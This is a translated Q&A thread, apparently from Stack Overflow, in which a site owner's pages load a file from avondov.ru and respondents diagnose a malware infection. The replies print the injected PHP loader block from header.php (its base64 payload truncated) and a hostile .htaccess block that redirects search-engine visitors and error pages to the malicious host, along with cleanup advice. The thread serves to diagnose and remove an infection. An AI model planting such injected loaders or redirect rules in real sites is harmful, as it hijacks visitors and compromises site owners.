当我的网站加载要从网站count29.php下载的文件avondov.ru时。这使得网站无法完全加载,有时会重定向到404找不到页面
我怎么能忽略这个错误?
我的网站是:http://adinehbajestan.ir
答案 0 :(得分:2)
您的网站感染了恶意软件, http://sitecheck.sucuri.net/results/adinehbajestan.ir
更新您的网站脚本和/或从备份恢复
答案 1 :(得分:0)
我想我发现了自己的问题。这是一个真正的恶意软件。此代码已添加到header.php中:
#d93065#
echo(gzinflate(base64_decode("3VXBbptAEP2V......1G5y+828z/8A")));
#/d93065#
从header.php中删除此代码时是正确的。
答案 2 :(得分:0)
是的,主要是像index.php或header.php这样的基页被
修改#d93065# echo(gzinflate(base64_decode("3VXBbptAEP2V......1G5y+828z/8A"))); #/d93065#
另外,不要忘记清除所有.htaccess文件,它们会被这个不需要的重定向修改
#d93065#
RewriteEngine On
ErrorDocument 400 avondov.ru/count29.php
ErrorDocument 401 avondov.ru/count29.php
ErrorDocument 403 avondov.ru/count29.php
ErrorDocument 404 avondov.ru/count29.php
ErrorDocument 500 avondov.ru/count29.php
ErrorDocument 502 avondov.ru/count29.php
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
# long list of referrers
RewriteCond %{HTTP_REFERER} .*flickr.*
RewriteRule ^(.*)$ avondov.ru/count29.php [R=301,L]
#/d93065#
这是一个临时的解决方法,但是入侵者可以像他那样再次修改, 它可能是由一个弱密码,第三部分插件或者你正在使用的CMS中的一个错误引起的,因为它已经渗透了joomla和wordpress网站。
-CK